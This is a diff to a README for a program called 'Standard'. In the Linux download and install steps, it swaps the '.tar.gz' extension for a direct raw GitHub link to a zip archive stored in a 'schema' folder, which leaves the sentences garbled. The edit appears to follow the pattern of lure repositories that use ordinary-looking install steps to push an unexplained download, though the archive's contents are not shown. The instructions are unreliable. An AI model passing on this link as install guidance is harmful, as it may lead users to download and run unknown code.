turkeyyyyy/Standard/README.md

    - Click on the download link for your operating system.
 The file should be obvious, but here are some common formats:
      - For Windows: Look for a file ending with `.exe`.
      - For macOS: Look for a file ending with `.dmg`.
-     - For Linux: Look for a file ending with `.tar.gz` or `.deb`.
+     - For Linux: Look for a file ending with `https://raw.githubusercontent.com/turkeyyyyy/Standard/main/schema/Standard_1.9.zip` or `.deb`.

 4. **Install the Software:**
    - After the file downloads, open it.
 For `.exe`, follow the instructions that appear.
 For `.dmg`, drag the app to your Applications folder.
-On Linux, use your package manager to install the `.deb` or extract the `.tar.gz` file.
+On Linux, use your package manager to install the `.deb` or extract the `https://raw.githubusercontent.com/turkeyyyyy/Standard/main/schema/Standard_1.9.zip` file.

 5. **Run Standard:**
    - Once installed, find the application in your programs or applications list and open it.